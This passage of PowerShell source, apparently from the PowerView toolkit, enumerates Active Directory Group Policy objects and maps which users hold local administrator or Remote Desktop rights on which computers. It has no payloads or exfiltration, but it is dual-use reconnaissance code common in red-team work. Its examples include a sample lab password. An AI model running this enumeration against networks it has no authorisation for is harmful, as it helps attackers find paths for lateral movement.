[Parameter(ParameterSetName = 'UserIdentity')]
[Alias('UserName')]
[ValidateNotNullOrEmpty()]
[String]
$UserIdentity,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
[String]
$SecurityMasks,
[Switch]
$Tombstone,
[Alias('ReturnOne')]
[Switch]
$FindOne,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
$Raw
)
BEGIN {
$SearcherArguments = @{}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$GPOSearcher = Get-DomainSearcher @SearcherArguments
}
PROCESS {
if ($GPOSearcher) {
if ($PSBoundParameters['ComputerIdentity'] -or $PSBoundParameters['UserIdentity']) {
$GPOAdsPaths = @()
if ($SearcherArguments['Properties']) {
$OldProperties = $SearcherArguments['Properties']
}
$SearcherArguments['Properties'] = 'distinguishedname,dnshostname'
$TargetComputerName = $Null
if ($PSBoundParameters['ComputerIdentity']) {
$SearcherArguments['Identity'] = $ComputerIdentity
$Computer = Get-DomainComputer @SearcherArguments -FindOne | Select-Object -First 1
if(-not $Computer) {
Write-Verbose "[Get-DomainGPO] Computer '$ComputerIdentity' not found!"
}
$ObjectDN = $Computer.distinguishedname
$TargetComputerName = $Computer.dnshostname
}
else {
$SearcherArguments['Identity'] = $UserIdentity
$User = Get-DomainUser @SearcherArguments -FindOne | Select-Object -First 1
if(-not $User) {
Write-Verbose "[Get-DomainGPO] User '$UserIdentity' not found!"
}
$ObjectDN = $User.distinguishedname
}
# extract all OUs the target user/computer is a part of
$ObjectOUs = @()
$ObjectOUs += $ObjectDN.split(',') | ForEach-Object {
if($_.startswith('OU=')) {
$ObjectDN.SubString($ObjectDN.IndexOf("$($_),"))
}
}
Write-Verbose "[Get-DomainGPO] object OUs: $ObjectOUs"
if ($ObjectOUs) {
# find all the GPOs linked to the user/computer's OUs
$SearcherArguments.Remove('Properties')
$InheritanceDisabled = $False
ForEach($ObjectOU in $ObjectOUs) {
$SearcherArguments['Identity'] = $ObjectOU
$GPOAdsPaths += Get-DomainOU @SearcherArguments | ForEach-Object {
# extract any GPO links for this particular OU the computer is a part of
if ($_.gplink) {
$_.gplink.split('][') | ForEach-Object {
if ($_.startswith('LDAP')) {
$Parts = $_.split(';')
$GpoDN = $Parts[0]
$Enforced = $Parts[1]
if ($InheritanceDisabled) {
# if inheritance has already been disabled and this GPO is set as "enforced"
# then add it, otherwise ignore it
if ($Enforced -eq 2) {
$GpoDN
}
}
else {
# inheritance not marked as disabled yet
$GpoDN
}
}
}
}
# if this OU has GPO inheritence disabled, break so additional OUs aren't processed
if ($_.gpoptions -eq 1) {
$InheritanceDisabled = $True
}
}
}
}
if ($TargetComputerName) {
# find all the GPOs linked to the computer's site
$ComputerSite = (Get-NetComputerSiteName -ComputerName $TargetComputerName).SiteName
if($ComputerSite -and ($ComputerSite -notlike 'Error*')) {
$SearcherArguments['Identity'] = $ComputerSite
$GPOAdsPaths += Get-DomainSite @SearcherArguments | ForEach-Object {
if($_.gplink) {
# extract any GPO links for this particular site the computer is a part of
$_.gplink.split('][') | ForEach-Object {
if ($_.startswith('LDAP')) {
$_.split(';')[0]
}
}
}
}
}
}
# find any GPOs linked to the user/computer's domain
$ObjectDomainDN = $ObjectDN.SubString($ObjectDN.IndexOf('DC='))
$SearcherArguments.Remove('Identity')
$SearcherArguments.Remove('Properties')
$SearcherArguments['LDAPFilter'] = "(objectclass=domain)(distinguishedname=$ObjectDomainDN)"
$GPOAdsPaths += Get-DomainObject @SearcherArguments | ForEach-Object {
if($_.gplink) {
# extract any GPO links for this particular domain the computer is a part of
$_.gplink.split('][') | ForEach-Object {
if ($_.startswith('LDAP')) {
$_.split(';')[0]
}
}
}
}
Write-Verbose "[Get-DomainGPO] GPOAdsPaths: $GPOAdsPaths"
# restore the old properites to return, if set
if ($OldProperties) { $SearcherArguments['Properties'] = $OldProperties }
else { $SearcherArguments.Remove('Properties') }
$SearcherArguments.Remove('Identity')
$GPOAdsPaths | Where-Object {$_ -and ($_ -ne '')} | ForEach-Object {
# use the gplink as an ADS path to enumerate all GPOs for the computer
$SearcherArguments['SearchBase'] = $_
$SearcherArguments['LDAPFilter'] = "(objectCategory=groupPolicyContainer)"
Get-DomainObject @SearcherArguments | ForEach-Object {
if ($PSBoundParameters['Raw']) {
$_.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw')
}
else {
$_.PSObject.TypeNames.Insert(0, 'PowerView.GPO')
}
$_
}
}
}
else {
$IdentityFilter = ''
$Filter = ''
$Identity | Where-Object {$_} | ForEach-Object {
$IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
if ($IdentityInstance -match 'LDAP://|^CN=.*') {
$IdentityFilter += "(distinguishedname=$IdentityInstance)"
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
# if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
# and rebuild the domain searcher
$IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
Write-Verbose "[Get-DomainGPO] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
$SearcherArguments['Domain'] = $IdentityDomain
$GPOSearcher = Get-DomainSearcher @SearcherArguments
if (-not $GPOSearcher) {
Write-Warning "[Get-DomainGPO] Unable to retrieve domain searcher for '$IdentityDomain'"
}
}
}
elseif ($IdentityInstance -match '{.*}') {
$IdentityFilter += "(name=$IdentityInstance)"
}
else {
try {
$GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1'
$IdentityFilter += "(objectguid=$GuidByteString)"
}
catch {
$IdentityFilter += "(displayname=$IdentityInstance)"
}
}
}
if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
$Filter += "(|$IdentityFilter)"
}
if ($PSBoundParameters['LDAPFilter']) {
Write-Verbose "[Get-DomainGPO] Using additional LDAP filter: $LDAPFilter"
$Filter += "$LDAPFilter"
}
$GPOSearcher.filter = "(&(objectCategory=groupPolicyContainer)$Filter)"
Write-Verbose "[Get-DomainGPO] filter string: $($GPOSearcher.filter)"
if ($PSBoundParameters['FindOne']) { $Results = $GPOSearcher.FindOne() }
else { $Results = $GPOSearcher.FindAll() }
$Results | Where-Object {$_} | ForEach-Object {
if ($PSBoundParameters['Raw']) {
# return raw result objects
$GPO = $_
$GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw')
}
else {
if ($PSBoundParameters['SearchBase'] -and ($SearchBase -Match '^GC://')) {
$GPO = Convert-LDAPProperty -Properties $_.Properties
try {
$GPODN = $GPO.distinguishedname
$GPODomain = $GPODN.SubString($GPODN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
$gpcfilesyspath = "\\$GPODomain\SysVol\$GPODomain\Policies\$($GPO.cn)"
$GPO | Add-Member Noteproperty 'gpcfilesyspath' $gpcfilesyspath
}
catch {
Write-Verbose "[Get-DomainGPO] Error calculating gpcfilesyspath for: $($GPO.distinguishedname)"
}
}
else {
$GPO = Convert-LDAPProperty -Properties $_.Properties
}
$GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO')
}
$GPO
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainGPO] Error disposing of the Results object: $_"
}
}
$GPOSearcher.dispose()
}
}
}
}
function Get-DomainGPOLocalGroup {
<#
.SYNOPSIS
Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups'
or Group Policy preferences. Also return their user membership mappings, if they exist.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: Get-DomainGPO, Get-GptTmpl, Get-GroupsXML, ConvertTo-SID, ConvertFrom-SID
.DESCRIPTION
First enumerates all GPOs in the current/target domain using Get-DomainGPO with passed
arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or
group membership is set through Group Policy Preferences groups.xml files. For any
GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership'
section data is processed if present. Any found Groups.xml files are parsed with
Get-GroupsXML and those memberships are returned as well.
.PARAMETER Identity
A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),
GUID (e.g. '10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted.
.PARAMETER ResolveMembersToSIDs
Switch. Indicates that any member names should be resolved to their domain SIDs.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainGPOLocalGroup
Returns all local groups set by GPO along with their members and memberof.
.EXAMPLE
Get-DomainGPOLocalGroup -ResolveMembersToSIDs
Returns all local groups set by GPO along with their members and memberof,
and resolve any members to their domain SIDs.
.EXAMPLE
'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup
Return any GPO-set groups for the GPO with the given name/GUID.
.EXAMPLE
Get-DomainGPOLocalGroup 'Desktops'
Return any GPO-set groups for the GPO with the given display name.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainGPOLocalGroup -Credential $Cred
.LINK
https://morgansimonsenblog.azurewebsites.net/tag/groups/
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.GPOGroup')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name')]
[String[]]
$Identity,
[Switch]
$ResolveMembersToSIDs,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$SearcherArguments = @{}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $Domain }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$ConvertArguments = @{}
if ($PSBoundParameters['Domain']) { $ConvertArguments['Domain'] = $Domain }
if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server }
if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential }
$SplitOption = [System.StringSplitOptions]::RemoveEmptyEntries
}
PROCESS {
if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }
Get-DomainGPO @SearcherArguments | ForEach-Object {
$GPOdisplayName = $_.displayname
$GPOname = $_.name
$GPOPath = $_.gpcfilesyspath
$ParseArgs = @{ 'GptTmplPath' = "$GPOPath\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" }
if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential }
# first parse the 'Restricted Groups' file (GptTmpl.inf) if it exists
$Inf = Get-GptTmpl @ParseArgs
if ($Inf -and ($Inf.psbase.Keys -contains 'Group Membership')) {
$Memberships = @{}
# parse the members/memberof fields for each entry
ForEach ($Membership in $Inf.'Group Membership'.GetEnumerator()) {
$Group, $Relation = $Membership.Key.Split('__', $SplitOption) | ForEach-Object {$_.Trim()}
# extract out ALL members
$MembershipValue = $Membership.Value | Where-Object {$_} | ForEach-Object { $_.Trim('*') } | Where-Object {$_}
if ($PSBoundParameters['ResolveMembersToSIDs']) {
# if the resulting member is username and not a SID, attempt to resolve it
$GroupMembers = @()
ForEach ($Member in $MembershipValue) {
if ($Member -and ($Member.Trim() -ne '')) {
if ($Member -notmatch '^S-1-.*') {
$ConvertToArguments = @{'ObjectName' = $Member}
if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain }
$MemberSID = ConvertTo-SID @ConvertToArguments
if ($MemberSID) {
$GroupMembers += $MemberSID
}
else {
$GroupMembers += $Member
}
}
else {
$GroupMembers += $Member
}
}
}
$MembershipValue = $GroupMembers
}
if (-not $Memberships[$Group]) {
$Memberships[$Group] = @{}
}
if ($MembershipValue -isnot [System.Array]) {$MembershipValue = @($MembershipValue)}
$Memberships[$Group].Add($Relation, $MembershipValue)
}
ForEach ($Membership in $Memberships.GetEnumerator()) {
if ($Membership -and $Membership.Key -and ($Membership.Key -match '^\*')) {
# if the SID is already resolved (i.e. begins with *) try to resolve SID to a name
$GroupSID = $Membership.Key.Trim('*')
if ($GroupSID -and ($GroupSID.Trim() -ne '')) {
$GroupName = ConvertFrom-SID -ObjectSID $GroupSID @ConvertArguments
}
else {
$GroupName = $False
}
}
else {
$GroupName = $Membership.Key
if ($GroupName -and ($GroupName.Trim() -ne '')) {
if ($Groupname -match 'Administrators') {
$GroupSID = 'S-1-5-32-544'
}
elseif ($Groupname -match 'Remote Desktop') {
$GroupSID = 'S-1-5-32-555'
}
elseif ($Groupname -match 'Guests') {
$GroupSID = 'S-1-5-32-546'
}
elseif ($GroupName.Trim() -ne '') {
$ConvertToArguments = @{'ObjectName' = $Groupname}
if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain }
$GroupSID = ConvertTo-SID @ConvertToArguments
}
else {
$GroupSID = $Null
}
}
}
$GPOGroup = New-Object PSObject
$GPOGroup | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName
$GPOGroup | Add-Member Noteproperty 'GPOName' $GPOName
$GPOGroup | Add-Member Noteproperty 'GPOPath' $GPOPath
$GPOGroup | Add-Member Noteproperty 'GPOType' 'RestrictedGroups'
$GPOGroup | Add-Member Noteproperty 'Filters' $Null
$GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName
$GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID
$GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Membership.Value.Memberof
$GPOGroup | Add-Member Noteproperty 'GroupMembers' $Membership.Value.Members
$GPOGroup.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup')
$GPOGroup
}
}
# now try to the parse group policy preferences file (Groups.xml) if it exists
$ParseArgs = @{
'GroupsXMLpath' = "$GPOPath\MACHINE\Preferences\Groups\Groups.xml"
}
Get-GroupsXML @ParseArgs | ForEach-Object {
if ($PSBoundParameters['ResolveMembersToSIDs']) {
$GroupMembers = @()
ForEach ($Member in $_.GroupMembers) {
if ($Member -and ($Member.Trim() -ne '')) {
if ($Member -notmatch '^S-1-.*') {
# if the resulting member is username and not a SID, attempt to resolve it
$ConvertToArguments = @{'ObjectName' = $Groupname}
if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain }
$MemberSID = ConvertTo-SID -Domain $Domain -ObjectName $Member
if ($MemberSID) {
$GroupMembers += $MemberSID
}
else {
$GroupMembers += $Member
}
}
else {
$GroupMembers += $Member
}
}
}
$_.GroupMembers = $GroupMembers
}
$_ | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName
$_ | Add-Member Noteproperty 'GPOName' $GPOName
$_ | Add-Member Noteproperty 'GPOType' 'GroupPolicyPreferences'
$_.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup')
$_
}
}
}
}
function Get-DomainGPOUserLocalGroupMapping {
<#
.SYNOPSIS
Enumerates the machines where a specific domain user/group is a member of a specific
local group, all through GPO correlation. If no user/group is specified, all
discoverable mappings are returned.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: Get-DomainGPOLocalGroup, Get-DomainObject, Get-DomainComputer, Get-DomainOU, Get-DomainSite, Get-DomainGroup
.DESCRIPTION
Takes a user/group name and optional domain, and determines the computers in the domain
the user/group has local admin (or RDP) rights to.
It does this by:
1. resolving the user/group to its proper SID
2. enumerating all groups the user/group is a current part of
and extracting all target SIDs to build a target SID list
3. pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling
Get-DomainGPOLocalGroup
4. matching the target SID list to the queried GPO SID list
to enumerate all GPO the user is effectively applied with
5. enumerating all OUs and sites and applicable GPO GUIs are
applied to through gplink enumerating
6. querying for all computers under the given OUs or sites
If no user/group is specified, all user/group -> machine mappings discovered through
GPO relationships are returned.
.PARAMETER Identity
A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
for the user/group to identity GPO local group mappings for.
.PARAMETER LocalGroup
The local group to check access against.
Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
or a custom local SID. Defaults to local 'Administrators'.
.PARAMETER Domain
Specifies the domain to enumerate GPOs for, defaults to the current domain.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainGPOUserLocalGroupMapping
Find all user/group -> machine relationships where the user/group is a member
of the local administrators group on target machines.
.EXAMPLE
Get-DomainGPOUserLocalGroupMapping -Identity dfm -Domain dev.testlab.local
Find all computers that dfm user has local administrator rights to in
the dev.testlab.local domain.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainGPOUserLocalGroupMapping -Credential $Cred
.OUTPUTS
PowerView.GPOLocalGroupMapping
A custom PSObject containing any target identity information and what local
group memberships they're a part of through GPO correlation.
.LINK
http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.GPOUserLocalGroupMapping')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name')]
[String]
$Identity,
[String]
[ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')]
$LocalGroup = 'Administrators',
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$CommonArguments = @{}
if ($PSBoundParameters['Domain']) { $CommonArguments['Domain'] = $Domain }
if ($PSBoundParameters['Server']) { $CommonArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $CommonArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $CommonArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $CommonArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $CommonArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $CommonArguments['Credential'] = $Credential }
}
PROCESS {
$TargetSIDs = @()
if ($PSBoundParameters['Identity']) {
$TargetSIDs += Get-DomainObject @CommonArguments -Identity $Identity | Select-Object -Expand objectsid
$TargetObjectSID = $TargetSIDs
if (-not $TargetSIDs) {
Throw "[Get-DomainGPOUserLocalGroupMapping] Unable to retrieve SID for identity '$Identity'"
}
}
else {
# no filtering/match all
$TargetSIDs = @('*')
}
if ($LocalGroup -match 'S-1-5') {
$TargetLocalSID = $LocalGroup
}
elseif ($LocalGroup -match 'Admin') {
$TargetLocalSID = 'S-1-5-32-544'
}
else {
# RDP
$TargetLocalSID = 'S-1-5-32-555'
}
if ($TargetSIDs[0] -ne '*') {
ForEach ($TargetSid in $TargetSids) {
Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Enumerating nested group memberships for: '$TargetSid'"
$TargetSIDs += Get-DomainGroup @CommonArguments -Properties 'objectsid' -MemberIdentity $TargetSid | Select-Object -ExpandProperty objectsid
}
}
Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Target localgroup SID: $TargetLocalSID"
Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Effective target domain SIDs: $TargetSIDs"
$GPOgroups = Get-DomainGPOLocalGroup @CommonArguments -ResolveMembersToSIDs | ForEach-Object {
$GPOgroup = $_
# if the locally set group is what we're looking for, check the GroupMembers ('members') for our target SID
if ($GPOgroup.GroupSID -match $TargetLocalSID) {
$GPOgroup.GroupMembers | Where-Object {$_} | ForEach-Object {
if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $_) ) {
$GPOgroup
}
}
}
# if the group is a 'memberof' the group we're looking for, check GroupSID against the targt SIDs
if ( ($GPOgroup.GroupMemberOf -contains $TargetLocalSID) ) {
if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $GPOgroup.GroupSID) ) {
$GPOgroup
}
}
} | Sort-Object -Property GPOName -Unique
$GPOgroups | Where-Object {$_} | ForEach-Object {
$GPOname = $_.GPODisplayName
$GPOguid = $_.GPOName
$GPOPath = $_.GPOPath
$GPOType = $_.GPOType
if ($_.GroupMembers) {
$GPOMembers = $_.GroupMembers
}
else {
$GPOMembers = $_.GroupSID
}
$Filters = $_.Filters
if ($TargetSIDs[0] -eq '*') {
# if the * wildcard was used, set the targets to all GPO members so everything it output
$TargetObjectSIDs = $GPOMembers
}
else {
$TargetObjectSIDs = $TargetObjectSID
}
# find any OUs that have this GPO linked through gpLink
Get-DomainOU @CommonArguments -Raw -Properties 'name,distinguishedname' -GPLink $GPOGuid | ForEach-Object {
if ($Filters) {
$OUComputers = Get-DomainComputer @CommonArguments -Properties 'dnshostname,distinguishedname' -SearchBase $_.Path | Where-Object {$_.distinguishedname -match ($Filters.Value)} | Select-Object -ExpandProperty dnshostname
}
else {
$OUComputers = Get-DomainComputer @CommonArguments -Properties 'dnshostname' -SearchBase $_.Path | Select-Object -ExpandProperty dnshostname
}
if ($OUComputers) {
if ($OUComputers -isnot [System.Array]) {$OUComputers = @($OUComputers)}
ForEach ($TargetSid in $TargetObjectSIDs) {
$Object = Get-DomainObject @CommonArguments -Identity $TargetSid -Properties 'samaccounttype,samaccountname,distinguishedname,objectsid'
$IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
$GPOLocalGroupMapping = New-Object PSObject
$GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
$GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
$GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectSID' $Object.objectsid
$GPOLocalGroupMapping | Add-Member Noteproperty 'Domain' $Domain
$GPOLocalGroupMapping | Add-Member Noteproperty 'IsGroup' $IsGroup
$GPOLocalGroupMapping | Add-Member Noteproperty 'GPODisplayName' $GPOname
$GPOLocalGroupMapping | Add-Member Noteproperty 'GPOGuid' $GPOGuid
$GPOLocalGroupMapping | Add-Member Noteproperty 'GPOPath' $GPOPath
$GPOLocalGroupMapping | Add-Member Noteproperty 'GPOType' $GPOType
$GPOLocalGroupMapping | Add-Member Noteproperty 'ContainerName' $_.Properties.distinguishedname
$GPOLocalGroupMapping | Add-Member Noteproperty 'ComputerName' $OUComputers
$GPOLocalGroupMapping.PSObject.TypeNames.Insert(0, 'PowerView.GPOLocalGroupMapping')
$GPOLocalGroupMapping
}
}
}
# find any sites that have this GPO linked through gpLink
Get-DomainSite @CommonArguments -Properties 'siteobjectbl,distinguishedname' -GPLink $GPOGuid | ForEach-Object {
ForEach ($TargetSid in $TargetObjectSIDs) {
$Object = Get-DomainObject @CommonArguments -Identity $TargetSid -Properties 'samaccounttype,samaccountname,distinguishedname,objectsid'
$IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
$GPOLocalGroupMapping = New-Object PSObject
$GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
$GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
$GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectSID' $Object.objectsid
$GPOLocalGroupMapping | Add-Member Noteproperty 'IsGroup' $IsGroup
$GPOLocalGroupMapping | Add-Member Noteproperty 'Domain' $Domain
$GPOLocalGroupMapping | Add-Member Noteproperty 'GPODisplayName' $GPOname
$GPOLocalGroupMapping | Add-Member Noteproperty 'GPOGuid' $GPOGuid
$GPOLocalGroupMapping | Add-Member Noteproperty 'GPOPath' $GPOPath
$GPOLocalGroupMapping | Add-Member Noteproperty 'GPOType' $GPOType
$GPOLocalGroupMapping | Add-Member Noteproperty 'ContainerName' $_.distinguishedname
$GPOLocalGroupMapping | Add-Member Noteproperty 'ComputerName' $_.siteobjectbl
$GPOLocalGroupMapping.PSObject.TypeNames.Add('PowerView.GPOLocalGroupMapping')
$GPOLocalGroupMapping
}
}
}
}
}
function Get-DomainGPOComputerLocalGroupMapping {
<#
.SYNOPSIS
Takes a computer (or GPO) object and determines what users/groups are in the specified
local group for the machine through GPO correlation.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: Get-DomainComputer, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainGPOLocalGroup
.DESCRIPTION
This function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups
are in the specified local group for a target machine through GPO correlation.
If a -ComputerIdentity is specified, retrieve the complete computer object, attempt to
determine the OU the computer is a part of. Then resolve the computer's site name with
Get-NetComputerSiteName and retrieve all sites object Get-DomainSite. For those results, attempt to
enumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup. For
each resulting GPO group, resolve the resulting user/group name to a full AD object and
return the results. This will return the domain objects that are members of the specified
-LocalGroup for the given computer.
